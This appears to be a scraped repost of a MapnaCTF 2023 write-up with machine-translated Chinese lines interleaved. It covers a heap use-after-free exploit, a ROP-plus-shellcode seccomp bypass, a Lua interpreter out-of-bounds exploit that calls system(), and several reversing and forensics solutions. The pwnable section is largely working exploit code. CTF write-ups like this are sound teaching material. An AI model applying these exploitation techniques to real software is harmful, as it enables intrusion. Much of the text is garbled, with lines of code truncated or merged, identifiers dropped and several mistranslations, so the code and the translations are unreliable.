MapnaCTF 2023 Writeup

WriteUp 8个月前 admin
105 0 0

I participated in MapnaCTF, which is a CTF event sponsored by Mapna group and hosted by ASIS team. I played it as a member of BunkyoWesterns *1 and stood 1st place 🙂
我参加了MapnaCTF,这是一个由Mapna集团赞助,ASIS团队主办的CTF活动。我作为BunkyoWesterns *1的成员玩了它,并获得了第一名:)

MapnaCTF 2023 Writeup
BunkyoWesterns’ cat is cute

MapnaCTF 2023 Writeup

The pwnable tasks (presumably) written by parrot were interesting yet beginner-friendly 👍👍👍

Pwnable 普恩纳布尔

Buggy Paint (16 solves)
Buggy Paint(16 solves)

The program is a paint-like application where you can draw some rectangles on a canvas. We can allocate and store the following structure into each pixels in the canvas.

MapnaCTF 2023 Writeup

Each rectangle has its position, size, color, and a byte array. If we select a rectangle, we can edit or show its byte array.

MapnaCTF 2023 Writeup

The bug lies in delete function. As you can find in the figure below, it doesn’t check if the deleted rectangle is selected at the moment. This will result in Use-after-Free accessing a deleted rectangle in edit and show functions.

MapnaCTF 2023 Writeup

I simply overlapped a rectangle object with byte array, with which I could overwrite the pointer of the rectangle’s data array. In this way we can get AAW primitive.

from ptrlib import *
# Utility functions
not important, redacted
libc = ELF(“./”)
#sock = Process(“./chall”)
sock = Socket(“nc 2000”)
# Leak heap
create(0, 0, 0x10, 2, 1, b“A”*0x20)
create(1, 0, 0x10, 2, 1, b“B”*0x20)
create(9, 9, 0x10, 2, 1, b“C”*0x20)
select(0, 0)
delete(0, 0)
heap_base = u64(show()[:8]) << 12“heap = “ + hex(heap_base))
# Leak libc
select(1, 0)
delete(1, 0)
target = heap_base + 0x360
edit(p64(target ^ (heap_base >> 12)))
create(2, 0, 0x10, 2, 1, p64(0x431)*4)
create(1, 0, 0x10, 2, 1, b“D”*0x20)
payload = p64(0x21)*((0x20 * 0x1e) // 8)
create(0, 0, 0x20, 0x1e, 1, payload)
select(1, 0)
delete(1, 0)
libc.base = u64(show()[:8]) – libc.main_arena() – 0x60
# Create AAW
payload = b“X”*0x20
payload += p64(9) + p64(9) + p64(heap_base) + p64(0x10) + p64(2)
payload += p64(heap_base + 0x3c0)
payload += p64(0) + p64(0x31)
payload += b“X”*(0x90len(payload))
payload += p64(0) # x
payload += p64(0) # y
payload += p64(heap_base)
payload += p64(0xe0) # width
payload += p64(1) # height
payload += p64(libc.symbol(“_IO_2_1_stderr_”))
create(2, 2, 0x10, 0x10, 1, payload)
not important, redacted
select(0, 0)
# Win
sock.sendlineafter(“> “, “6”)

First blood 🩸 第一滴血

Protector (12 solves) 保护器(12解决)

This challenge is so straightforward that I can’t understand why only 12 teams solved it*2.
这个挑战是如此简单,我不明白为什么只有12个团队解决了它 *2。

The challenge is a simple stack buffer overflow with seccomp enabled. The flag is located in maze folder where many other dummy files exist.
挑战是一个简单的堆栈缓冲区溢出与seccomp启用。该标志位于 maze 文件夹中,其中存在许多其他虚拟文件。

Since mprotectopenreadwritegetdents are allowed, we can search for the flag in the directory.
由于允许使用 mprotect 、 open 、 read 、 write 、 getdents ,因此我们可以在目录中搜索标志。

from ptrlib import *
elf = ELF(“./chall”)
while True:
#sock = Process(“./chall”)
sock = Socket(“nc 10000”)
#sock = Socket(“localhost”, 5000)
addr_rop1 = 0x4040a0
size = 0x400
# Stage 1
payload = b“A”*0x28
payload += flat([
# read(0, addr_rop1, size)
next(elf.gadget(“pop rdi; pop rsi; pop rdx; ret;”)),
0, addr_rop1, size,
# read(0, read@got, 2)
next(elf.gadget(“pop rdi; pop rsi; pop rdx; ret;”)),
0,“read”), 2,
# rsp = addr_rop1-8
next(elf.gadget(“pop rbp; ret;”)),
addr_rop1 – 8,
next(elf.gadget(“leave; ret;”))
], map=p64)
payload += b“A” * (0x98len(payload))
sock.sendafter(“Input: “, payload)
# Stage 2
payload = flat([
# mprotect(0x404000, 0x1000, 7)
next(elf.gadget(“pop rdi; pop rsi; pop rdx; ret;”)),
0x404000, 0x1000, 7,
# shellcode
], map=p64)
payload += nasm(f“””
xor esi, esi
lea rdi, [rel maze]
mov eax, {}
mov r13, rax
mov edx, 0x40
lea rsi, [rel data]
mov rdi, r13
mov eax, {syscall.x64.getdents}
test eax, eax
jz end
mov dword [rel data + 18 – 5], ‘maze’
mov byte [rel data + 18 – 1], ‘/’
xor esi, esi
lea rdi, [rel data + 18 – 5]
mov eax, {}
mov edx, 0x100
lea rsi, [rel data]
mov edi, eax
mov eax, {}
test rax, rax
jle lp
mov edx, eax
mov edi, 1
mov eax, {syscall.x64.write}
jmp lp
xor edi, edi
mov eax, {syscall.x64.exit_group}
maze: db “./maze”, 0
“””, bits=64)
payload += b“A” * (size – len(payload))
# read –> mprotect
print(sock.recvonce(4, timeout=2))
except TimeoutError:

By the way, my exploit partially overwrites GOT entry of read to create a pointer to mprotect. I thought it would require brute force of 4-bit entropy because only 12 bits out of the 2 bytes are fixed.
顺便说一下,我的漏洞部分覆盖了GOT条目 read ,以创建指向 mprotect 的指针。我认为这将需要4位熵的蛮力,因为2个字节中只有12位是固定的。

The funny thing, however, is that it didn’t require brute force thanks to the broken ASLR:

First blood 🩸 第一滴血

U2S (2 solves) U2S(2个解决方案)

I think this challenge is very educational and is a good introduction to exploiting Lua.

The following patch introduced a bug.

diff –git a/src/lvm.h b/src/lvm.h
index dba1ad2..485b5aa 100644
— a/src/lvm.h
+++ b/src/lvm.h
@@ -96,7 +96,7 @@ typedef enum {
#define luaV_fastgeti(L,t,k,slot) \
(!ttistable(t) \
? (slot = NULL, 0) /* not a table; ‘slot’ is NULL and result is 0 */ \
– : (slot = (l_castS2U(k) – 1u < hvalue(t)->alimit) \
+ : (slot = (l_castU2S(k) – 1u < hvalue(t)->alimit) \
? &hvalue(t)->array[k – 1] : luaH_getint(hvalue(t), k), \
!isempty(slot))) /* result not empty? */

The macro luaV_fastgeti is used for getting an element of an array. S2U means “signed to unsigned”, and U2S means “unsigned to signed.” This apparently causes type mismatch.
宏 luaV_fastgeti 用于获取数组的元素。 S2U 表示“signed to unsigned”, U2S 表示“unsigned to signed”。“这显然会导致类型不匹配。

In fact, it allows negative out-of-bounds access of array.

Sadly, another patch disables leaking pointers through tostring function that I often use when exploting Lua.
可悲的是,另一个补丁禁止泄漏指针通过 tostring 函数,我经常使用时,利用Lua。

diff –git a/src/lapi.c b/src/lapi.c
index 34e64af..b1501c8 100644
— a/src/lapi.c
+++ b/src/lapi.c
@@ -473,18 +473,7 @@ LUA_API lua_State *lua_tothread (lua_State *L, int idx) {
** conversion should not be a problem.)
LUA_API const void *lua_topointer (lua_State *L, int idx) {
– const TValue *o = index2value(L, idx);
– switch (ttypetag(o)) {
– case LUA_VLCF: return cast_voidp(cast_sizet(fvalue(o)));
– return touserdata(o);
– default: {
– if (iscollectable(o))
– return gcvalue(o);
– else
– return NULL;
– }
– }
+ return NULL;

So, the first thing we need to do is leaking some addresses.

In order to make the exploit stable, I always spray data to consume freed chunks:

— Consume all freed chunks
local allocator = string.rep(“A”, 0x1000)
local consume = {}
local consume_i = 0
for size = 0x800, 0x10, –0x10 do
for i = 1, 8 do
consume_i = consume_i + 1
consume[consume_i] = string.sub(allocator, -size)
for i = 1, 0x20 do
consume_i = consume_i + 1
consume[consume_i] = { 0xdead }
for i = 1, 0x80 do
consume_i = consume_i + 1
consume[consume_i] = string.sub(allocator, –0x40) .. “xx”
consume[0] = string.sub(allocator, –0x20) .. “xx”
local gorilla = {};

In this way, continuous region will be carved out from heap when allocating objects. For example, assume that we allocate a string and an array like this:

local leak = string.rep(“C”, 0x30)
local evil = {3.14, 3.14, 3.14, 3.14}

Then, the memory layout looks like this:

MapnaCTF 2023 Writeup

Thanks to the heap spray, offset between the string data and the array data is fixed. So, we can create addrof/fakeobj primitive easily.

Lua value is a pair of pointer and type.

#define TValuefields Value value_; lu_byte tt_
typedef struct TValue {
} TValue;

The value of a built-in function is function pointer. So, if we set a built-in function out-of-bounds in the array, we can leak the pointer from string. (Addrof primitive)

— Leak proc base
local leak = string.rep(“C”, 0x30)
local evil = {3.14, 3.14, 3.14, 3.14}
evil[-7] = print
local proc_base = u64(string.sub(leak, 9, 16)) – 0x376d4

Similarly, we can get an element out-of-bounds to refer to a fake object. (Fakeobj primitive)

— Call fake func
local fake = p64(0)
.. p64(proc_base + 0x6670) .. p64(0x16) — fake built-in function (system@plt)
local evil = {1.11, 1.11, 1.11, 1.11}

I could have just called os.execute because the source code is built as debug mode. However, I thought the feature was optimized out and decided to call system directly. (and yeah it’s more practical in real-world examples!)
我可以直接调用 os.execute ,因为源代码是以调试模式构建的。然而,我认为这个功能已经优化了,并决定直接调用 system 。(and是的,它在现实世界的例子中更实用!)

So, if you’re reading this article to get the flag, you can simply call os.execute and skip the rest of this writeup. If you’re interested in how to make AAR/AAW primitives in Lua, you can continue reading it 🙂
因此,如果您正在阅读本文以获取标志,您可以简单地调用 os.execute 并跳过本文的其余部分。如果你对如何在Lua中创建AAR/ AAW原语感兴趣,你可以继续阅读它:)

The first argument passed to the (fake) built-in function is lua_State:
传递给(假)内置函数的第一个参数是 lua_State :

MapnaCTF 2023 Writeup

If we copy our command string into this variable and call system, we will get the flag. Lua interpreter has only one state and it’s stored in a global variable named globalL:
如果我们将命令串复制到这个变量中并调用system,我们将获得标志。Lua解释器只有一个状态,它存储在一个名为 globalL 的全局变量中:

MapnaCTF 2023 Writeup

Since we have the program base address, we can leak it by making AAR primitive.

Making AAR primitive is a bit tricky because each Lua value must have a valid type. Meanwhike, making AAW primitive is simple because we don’t need to care about the type.

To read a value from memory, we have to first write the type (LUA_NUMBER) to the address plus 8. (For more details, you can check this article that I wrote before.)
要从内存中读取一个值,我们必须首先将类型( LUA_NUMBER )写入地址加8。(For更多的细节,你可以查看我之前写的这篇文章。

The following code will leak the address of globalL:
下面的代码将泄漏 globalL 的地址:

— Leak lua state
local fake_func = p64(0)
.. p64(proc_base + 0x6670) .. p64(0x16) — fake function
.. p64(addr_fake_table + 0x20) .. p64(0x45) — fake table 1
.. p64(addr_fake_table + 0x50) .. p64(0x45) — fake table 2
local satoki = {2.17, 2.17, 2.17, 2.17}
satoki[-5][1] = 0x13
— Read float as bytes
evil[-6] = satoki[-6][1]
local addr_state = u64(string.sub(leak, 25, 32))

Let’s write our command string to globalL. We need to call /readflag to get the flag. I wrote /readf* instead because it requires just a single write.
让我们将命令字符串写入 globalL 。我们需要打电话给 /readflag 去拿旗子。我写了 /readf* ,因为它只需要一次写入。

— Call fake func
local fake = p64(0)
.. p64(proc_base + 0x6670) .. p64(0x16) — system
.. p64(addr_fake_table2 + 0x20) .. p64(0x45)
local sugiyama = {1.11, 1.11, 1.11, 1.11}
sugiyama[-5][1] = 7.342735162138363e-308 — “/readf*\0”

Full exploit: 充分利用:

function pwn()
— Utility
function p64(v)
local s = “”;
for i = 0, 7 do
s = s .. string.char((v >> (i * 8)) & 0xff)
return s;
function u64(s)
local v = 0
for i = 0, 7 do
v = v + (string.byte(s, i+1) << (i*8))
return v;
— Consume all freed chunks
local allocator = string.rep(“A”, 0x1000)
local consume = {}
local consume_i = 0
for size = 0x800, 0x10, –0x10 do
for i = 1, 8 do
consume_i = consume_i + 1
consume[consume_i] = string.sub(allocator, -size)
for i = 1, 0x20 do
consume_i = consume_i + 1
consume[consume_i] = { 0xdead }
for i = 1, 0x80 do
consume_i = consume_i + 1
consume[consume_i] = string.sub(allocator, –0x40) .. “xx”
consume[0] = string.sub(allocator, –0x20) .. “xx”
local gorilla = {};
— Leak proc base
local leak = string.rep(“C”, 0x30)
local evil = {3.14, 3.14, 3.14, 3.14}
evil[-7] = print
local proc_base = u64(string.sub(leak, 9, 16)) – 0x376d4
— Leak fake table
local fake_table = p64(0)
.. p64(0) — fake table 1
.. p64(0x00000004003f1005)
.. p64(proc_base + 0x50050) — globalL
.. p64(proc_base + 0x42510)
.. p64(0) .. p64(0)
.. p64(0) — fake table 2
.. p64(0x00000004003f1005)
.. p64(proc_base + 0x50058) — globalL + 8
.. p64(proc_base + 0x42510)
.. p64(0) .. p64(0)
evil[-6] = fake_table
local addr_fake_table = u64(string.sub(leak, 25, 32))
— Leak lua state
local fake_func = p64(0)
.. p64(proc_base + 0x6670) .. p64(0x16) — fake function
.. p64(addr_fake_table + 0x20) .. p64(0x45) — fake table 1
.. p64(addr_fake_table + 0x50) .. p64(0x45) — fake table 2
local satoki = {2.17, 2.17, 2.17, 2.17}
satoki[-5][1] = 0x13
— Read float as bytes
evil[-6] = satoki[-6][1]
local addr_state = u64(string.sub(leak, 25, 32))
— Leak fake table
local fake_table2 = p64(0)
.. p64(0) — fake table 3
.. p64(0x00000004003f1005)
.. p64(addr_state) — target
.. p64(proc_base + 0x42510)
.. p64(0) .. p64(0)
evil[-6] = fake_table2
local addr_fake_table2 = u64(string.sub(leak, 25, 32))
— Call fake func
local fake = p64(0)
.. p64(proc_base + 0x6670) .. p64(0x16) — system
.. p64(addr_fake_table2 + 0x20) .. p64(0x45)
local sugiyama = {1.11, 1.11, 1.11, 1.11}
sugiyama[-5][1] = 7.342735162138363e-308 — “/readf*\0”
— EOF —

First blood 🩸 第一滴血

Reversing 换向

Compile Me! (142 solves)

Compile the given C code and feed the code to stdin to get the flag. Note that you don’t need to append newline in the code.

Heaverse (42 solves) 重(42解决)

The program looks like a custom VM but just implements meaningless instructions like making a sound or sleeping for a while. I checked the stack and found the flag encoded with morse.

MapnaCTF 2023 Writeup

First blood 🩸 第一滴血

Prism (23 sovles) 棱镜(23 sovles)

The program just prints “Your mission is to find the flag! Try harder!!”. The function that prints this string is located at 0x31c0. The string is encoded with XOR cipher.
程序只是打印“你的使命是找到国旗!再努力一点!“.打印此字符串的函数位于0x 31 c 0。字符串使用XOR密码进行编码。

MapnaCTF 2023 Writeup

I looked over other functions and found 0x3330 prints the flag.
我查看了其他函数,发现0x 3330打印了标志。

MapnaCTF 2023 Writeup

First blood 🩸 第一滴血

Tetim (7 solves) Tetim(7解决方案)

The program accepts a binary file and outputs a PNG file. Since the binary is compiled by Zig, I decided to analyze it dynamically without reading the code.

I wrote a code like this:

import os
from PIL import Image
with open(“a.bin”, “wb”) as f:
os.system(“./tetim.elf embed a.bin”)
img =“a.bin.enc”)
for y in range(img.size[1]):
for x in range(img.size[0]):
print(img.getpixel((x, y)))

It turned out that each byte is mapped to color code of each pixel. (The output is sometimes different but mostly the same.)

from PIL import Image
img =“secret.enc”)
data = b“”
for y in range(img.size[1]):
for x in range(img.size[0]):
c = img.getpixel((x, y))
data += bytes([c[0]])

Output: 输出量:

b'IPEG (/\xcb\x88d\xc9\x91e\xc9\xaaq\xc9\x9b\xc9\xa1/!JAY-oeg,\x1fshort\x1ffor Joint Photohraphic Fxperts Grotp)[2] hs a comlonly ured method of lossy compresrion epr digital imahes, paruicularmy for those images produced by\x1fdigital photography. The degree\x1fof compqessioo!can be adiusted+ allowing a!selectable sradeoff between storage size\x1fand image qualitx. JPEG szpicakly achievet\x1f10:1 compression\x1fwith ljttle oerceptible loss hn imafe qvalitx.\\3] Since its introcuction!jn 1992, JPEG has bfen the moss widely used image conpressinn ssandard in the world,[4][5] and she most widely used digital image form`t, witi several billinn JPEG hm`ges proeuced euery day as!of 2015.[6]\n\nThe Joint Photographic Experts Group created tie standard in 1992.[7] JPEG was largely responshble for she proliferation pe digital images and digital phosos across\x1fuhe Hnternet and later social media.[8][circular referfnce] IPEG compression js used in a numbds of image file formats. JPEG/Exif is the!mort common image format utfc by\x1fdigital c`meras and other photographic inagf capttre devices; alonf xhth JPEG/JFIE, it is the nost cnmmnn foqmat fpr stosing and uranslitsing photographic images on the Wprld Wide Web.[9] These form`t varibtions are often npu cistinguished and arf sjmply\x1fcalled JPEG.\n\nThe MIME meeia type foq JPEG is "imagf/jpeg," except in!older Ioternet Dxplorer versions, whjch providd a MIMD\x1ftype of "image/pjpeg" when uploading JPEG hmahes/[10] JOEG files usuallz gave a filename\x1fextenshom of "ipg" or "jpeg!. JPEG/JFIF supoorts ` laximum image tize!of 65,635\xc3\x9765,535 pixels,[11] hence up to 4!gigapixels for `n aspebt ratjo of 1:1. In 3000+ the IPEG group introcuced a format intended to be a successor, KPEG 2000, but\x1fiu was unabld to rdplace the original\x1fJPFG as thd!dominant image rtbndard.\n\nMAPNA{__ZiG__JPEG^!M49e_3nD0DeR_rEv3R5e!!!}\n+++++++++++*++++++++*++++++++,++++++++++,+\nMAPNA{__ZiG__JPEG_!M49e_3nC0DdR_rEv3R5e!!!}\n++++++++++++++++++++++++++++++++++++++++++\nMAPNA{`_ZiG__KPEG_!M49e_3nC0DeR_rEv3R5e"!!}\n++++*++,+,+,+++++++++*+++++++++++++++++,++\nMAPNA{__ZiG__JOEG_!M39e_2nC1DeR^rEv3R5e"! }\n++*+++++++++,+++++++++++++++++++++++++++++====<=='

I chose words that makes sense and it was correct:


First blood 🩸 第一滴血

Forensics 取证

Mitrek (2 solves) Mitrek(2个解决方案)

It’s been a while since I last solved guessy forensics challenges 🙂

We’re given a pcap file which contains only 2 streams of UDP packets communicating over localhost on port 31337 and 31338. Each packet looks like this:

MapnaCTF 2023 Writeup

Reading some of them, I noticed the packet structure:

typedef struct {
  u8 size;
  u32 always_one;
  u8 size_minus_2;
  u8 seq_number;
  u8 type;
  u8 contents[0]; // size-7 bytes
} packet_t;

I found type represents what kind of packet is means:
我发现 type 代表什么样的数据包是指:

  • F: Sends file name to be saved
    F :发送要保存的文件名
  • D: Data  D :数据
  • Y: Accepted  Y :已接受
  • N: Denied  N :拒绝
  • S: Unknown (Handshake?)
    S :未知(握手?)

I wrote script that dumps the sent files based on the rule above.

from scapy.all import *
from ptrlib import *
filename = None
output = {}
fixed = {}
gorira = None
def analyze(pkt):
global filename, output, fixed, gorira
if pkt[UDP].sport < pkt[UDP].dport:
pair = pkt[UDP].sport, pkt[UDP].dport
pair = pkt[UDP].dport, pkt[UDP].sport
payload = bytes(pkt[UDP][Raw].load)
size = payload[0]
seq = payload[6]
type = payload[7]
data = payload[8:1+size]
if pkt[UDP].dport == 31337:
#print(pkt[UDP].sport, pkt[UDP].dport, seq, data)
gorira = pkt[UDP].sport, pkt[UDP].dport, seq, data
if size == 18: # heuristic
if type == ord(‘F’) or type == 0: # ignore file name and garbage
filename = data
output[(pair, filename)] = {}
fixed[(pair, filename)] = set()
if type == ord(‘N’) or type == ord(‘Y’):
if type == ord(‘Y’):
if (pair, filename) in fixed:
fixed[(pair, filename)].add(seq)
#print(pkt[UDP].sport, pkt[UDP].dport, seq, data[:0x10])
if type == ord(‘D’): # data
if seq not in fixed:
output[(pair, filename)][seq] = data
sniff(offline=“mitrek”, store=0, prn=analyze)
for key in output:
pair, filename = key
if len(output[key]) == 0: continue
f = open(filename.strip(b\x00).decode() + str(pair[0]), “wb”)
for seq in output[key]:
if seq in fixed[(pair, filename)]:

The script saves 3 files and we can find each piece of flag image.

First blood 🩸 *3 第一滴血 *3🩸

*1:a joke team not relevant to TokyoWesterns at all

*2:Probably because it’s released later

*3:The distributed file was wrong at first and kanon kindly stole my first blood when the file was updated 🥲

原文始发于Hatena BlogMapnaCTF 2023 Writeup

版权声明:admin 发表于 2024年1月24日 上午10:21。
转载请注明:MapnaCTF 2023 Writeup | CTF导航
